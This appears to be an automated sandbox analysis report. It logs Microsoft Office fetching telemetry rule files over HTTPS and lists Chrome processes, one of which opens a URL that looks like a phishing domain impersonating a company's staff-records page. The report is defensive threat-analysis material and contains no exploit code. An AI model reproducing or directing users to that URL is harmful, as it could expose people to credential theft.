                                  2024-11-25 23:29:29 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  59192.168.2.44980813.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:29 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:29 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:29 GMT
                                  Content-Type: text/xml
                                  Content-Length: 479
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                  ETag: "0x8DC582BB7D702D0"
                                  x-ms-request-id: 8dfbf447-101e-0028-0f8e-3f8f64000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232929Z-174f7845968vqt9xhC1EWRgten0000000up0000000000ggq
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:29 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  60192.168.2.44981013.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:29 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:30 UTC470INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:29 GMT
                                  Content-Type: text/xml
                                  Content-Length: 475
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                  ETag: "0x8DC582BB2BE84FD"
                                  x-ms-request-id: fac49ef3-501e-008f-0a91-3f9054000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232929Z-174f7845968jrjrxhC1EWRmmrs0000000uqg000000000d58
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:30 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  61192.168.2.44980913.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:29 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:30 UTC470INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:29 GMT
                                  Content-Type: text/xml
                                  Content-Length: 425
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                  ETag: "0x8DC582BBA25094F"
                                  x-ms-request-id: cb9203b6-501e-0029-2691-3fd0b8000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232929Z-174f78459685726chC1EWRsnbg0000000urg0000000009yt
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:30 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  62192.168.2.44981113.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:30 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:30 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:30 GMT
                                  Content-Type: text/xml
                                  Content-Length: 448
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                  ETag: "0x8DC582BB389F49B"
                                  x-ms-request-id: e14f358b-d01e-007a-5d7e-3ff38c000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232930Z-174f7845968pf68xhC1EWRr4h80000000utg00000000088w
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:30 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                  Click to jump to process

                                  Click to jump to process

                                  Click to jump to process

                                  Target ID:0
                                  Start time:18:28:05
                                  Start date:25/11/2024
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                  Imagebase:0x7ff76e190000
                                  File size:3'242'272 bytes
                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:false

                                  Target ID:2
                                  Start time:18:28:08
                                  Start date:25/11/2024
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1824,i,5043773792219058669,17741932396626826224,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                  Imagebase:0x7ff76e190000
                                  File size:3'242'272 bytes
                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:false

                                  Target ID:3
                                  Start time:18:28:11
                                  Start date:25/11/2024
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt/"
                                  Imagebase:0x7ff76e190000
                                  File size:3'242'272 bytes
                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  No disassembly